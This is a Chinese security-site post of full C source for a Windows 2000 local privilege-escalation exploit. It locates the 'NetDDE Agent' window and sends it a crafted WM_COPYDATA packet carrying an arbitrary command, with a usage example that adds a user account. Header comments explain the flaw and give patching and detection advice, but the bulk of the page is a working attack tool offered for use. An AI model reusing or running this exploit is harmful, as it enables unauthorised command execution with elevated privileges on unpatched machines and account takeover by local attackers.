w2k本地溢出netddemsg源码
发布时间:2008-11-20   点击:   来源:本站原创   录入者:佚名
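  // netddemsg.cpp : Defines the entry point for the application.
// To link include library nddeapi.lib
//
// Reviewer summary:
//   This listing looks up the top-level window of class "NDDEAgnt", builds a
//   buffer made of a fixed 0x18-byte header, a NetDDE share name and a command
//   line, and delivers that buffer with WM_COPYDATA. The page title describes
//   it as a local issue on Windows 2000 ("w2k").
//   NOTE(review): presumably the NetDDE agent acts on the embedded command line
//   in a more privileged context than the sender, which is what would make this
//   a privilege boundary problem; confirm against the vendor advisory. The title
//   calls it an "overflow", but nothing in this code overflows a buffer: the
//   weakness exercised is a window that trusts messages from any sender.
//   Defensive takeaways: install the vendor fix, disable the Network DDE
//   services where they are not needed, and treat process creation by the
//   process that owns the "NetDDE Agent" window as a detection signal.
//
// The page this was recovered from had collapsed the file onto three lines and
// turned most of main() into HTML-attribute residue (identifiers lower-cased,
// `=""` between tokens). The structure below is restored from those tokens.
// The capitalisation of three messages in main() ("You must specify a command
// to run.", "Couldn't find NetDDE agent window, ..." and "Try command through
// the '%s' share?") was lost and is restored by analogy with the intact
// messages. One comment fragment in the share enumeration was unreadable and
// is omitted.

#include <windows.h>
#include <limits.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <nddeapi.h>

// Scratch buffer for formatted console messages. It has static storage, so it
// starts zero-filled; every _snprintf below is given sizeof(mess) - 1 so the
// last byte is never written and the buffer stays NUL-terminated even when
// _snprintf truncates (it does not terminate on truncation).
char mess[300];

// Print one line to stdout, followed by CR LF.
void OutPutString(char *str)
{
    printf("%s\r\n", str);
}

// Print the text for an NDde API error code.
// Deliberately does not exit (the original had `exit(err)` commented out);
// callers decide whether the failure is fatal.
void NDDEError(UINT err)
{
    // Start empty so a failed lookup prints a blank line, not stack garbage.
    char error[256] = "";

    NDdeGetErrorString(err, error, sizeof(error));
    OutPutString(error);
}

// Build the message buffer: 0x18-byte header, share name with its NUL, then
// command line with its NUL.
//
//   svShareName  NUL-terminated share name
//   svCmdLine    NUL-terminated command line
//   pBufLen      receives the total buffer length on success
//
// Returns a malloc()ed buffer the caller must free(), or NULL on failure
// (a message has already been printed).
void *BuildNetDDEPacket(const char *svShareName, const char* svCmdLine, int *pBufLen)
{
    // 0xDDE1DDE1(magic number) 0x00000001 (?) 0x00000001 (?)
    // ShareModId unused (?)
    // Only the first 0x18 bytes are copied into the packet.
    static const char magic[0x20]="\xE1\xDD\xE1\xDD\x01\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x09\x00\x00\x00\x01\xCC\xCC\xCC\xCC\x0";
    const size_t hdrlen = 0x18;
    const size_t sharelen = strlen(svShareName) + 1;   // includes the NUL
    const size_t cmdlen = strlen(svCmdLine) + 1;       // includes the NUL

    // The length is reported through an int; refuse sizes that would not fit
    // instead of letting the sum wrap.
    if (sharelen > (size_t)INT_MAX - hdrlen ||
        cmdlen > (size_t)INT_MAX - hdrlen - sharelen) {
        OutPutString("Out of memory.");
        return NULL;
    }

    const size_t funkylen = hdrlen + sharelen + cmdlen;
    char *funky = (char *)malloc(funkylen);
    if (funky == NULL) {
        OutPutString("Out of memory.");
        return NULL;
    }

    memcpy(funky, magic, hdrlen);
    memcpy(funky + hdrlen, svShareName, sharelen);           // Share name
    memcpy(funky + hdrlen + sharelen, svCmdLine, cmdlen);    // Command line

    *pBufLen = (int)funkylen;
    return funky;
}

// Print the syntax help and terminate the process with status 0.
void Usage(char *file)
{
    _snprintf(mess, sizeof(mess) - 1, "Syntax is: %s [-s sharename] <\"command line\">\r\n", file);
    OutPutString(mess);
    _snprintf(mess, sizeof(mess) - 1, "\t if the command line contain BLANK, use \" \" to include it,\r\n \t for ex: %s \"net user xxx xx /add\"\r\n", file);
    OutPutString(mess);
    OutPutString("\t /? or NO parameter show this.");
    exit(0);
}

// Entry point. Arguments: [-s sharename] "command line".
// Returns 0 after the message has been sent, -1 on any failure.
int main(int argc, char *argv[])
{
    // Check command line
    if (argc <= 1 || !stricmp(argv[1], "/?"))
        Usage(argv[0]);     // does not return

    char *szShare = NULL;
    int cmdNo = 1;
    if (strncmp(argv[1], "-s", 2) == 0) {
        if (argc < 3) {
            OutPutString("You must specify a share after '-s'!");
            return -1;
        }
        szShare = argv[2];
        cmdNo = 3;
    }
    if (argc < cmdNo + 1) {
        OutPutString("You must specify a command to run.");
        return -1;
    }
    char *szCmdLine = argv[cmdNo];

    // Get NetDDE Window
    HWND hwnd = FindWindow("NDDEAgnt", "NetDDE Agent");
    if (hwnd == NULL) {
        // GetLastError() returns a DWORD; print it with a matching specifier.
        _snprintf(mess, sizeof(mess) - 1, "Couldn't find NetDDE agent window, error code:%lu\r\n",
                  (unsigned long)GetLastError());
        OutPutString(mess);
        return -1;
    }

    // Get list of shares to try. The list is a sequence of NUL-terminated
    // names ended by an empty name; both branches allocate two spare zero
    // bytes so the walk below always finds that terminator.
    char *sharenames = NULL;
    if (szShare == NULL) {
        // Try all shares
        UINT err;
        DWORD dwNumShares = 0;
        DWORD dwSize = 256;
        // Start empty so a failed name lookup passes "" rather than garbage.
        char svCompName[256] = "";

        // Get computer name
        GetComputerName(svCompName, &dwSize);

        // First call only asks how large the list is.
        dwSize = 0;
        err = NDdeShareEnum(svCompName, 0, NULL, 0, &dwNumShares, &dwSize);
        if (err != NDDE_NO_ERROR && err != NDDE_BUF_TOO_SMALL) {
            // The original printed the error and carried on with a buffer
            // that was never filled; stop here instead.
            NDDEError(err);
            return -1;
        }

        sharenames = (char *)calloc((size_t)dwSize + 2, 1);
        if (sharenames == NULL) {
            OutPutString("Out of memory.");
            return -1;
        }

        err = NDdeShareEnum(svCompName, 0, (LPBYTE)sharenames, dwSize, &dwNumShares, &dwSize);
        if (err != NDDE_NO_ERROR) {
            NDDEError(err);
            free(sharenames);
            return -1;
        }
    } else {
        // Try command line share
        const size_t len = strlen(szShare);

        sharenames = (char *)calloc(len + 2, 1);
        if (sharenames == NULL) {
            OutPutString("Out of memory.");
            return -1;
        }
        memcpy(sharenames, szShare, len);
    }

    // Walk the share list. As in the original listing, the loop stops after
    // the first share (unconditional break below).
    int rc = 0;
    for (char *sharename = sharenames; *sharename != '\0'; sharename += strlen(sharename) + 1) {
        // Tell user
        if (szShare == NULL) {
            _snprintf(mess, sizeof(mess) - 1, "Try command through the '%s' share?", sharename);
            OutPutString(mess);
        }

        // Get NetDDE packet
        int funkylen = 0;
        void *funky = BuildNetDDEPacket(sharename, szCmdLine, &funkylen);
        if (funky == NULL) {
            rc = -1;
            break;
        }

        // Perform CopyData
        COPYDATASTRUCT cds;
        cds.cbData = funkylen;
        cds.dwData = 0;
        cds.lpData = (PVOID)funky;
        SendMessage(HWND_BROADCAST, WM_COPYDATA, (WPARAM)hwnd, (LPARAM)&cds);

        // Free memory. The original placed this after the break, so it was
        // never reached.
        free(funky);
        break;
    }

    // Free memory
    free(sharenames);
    return rc;
}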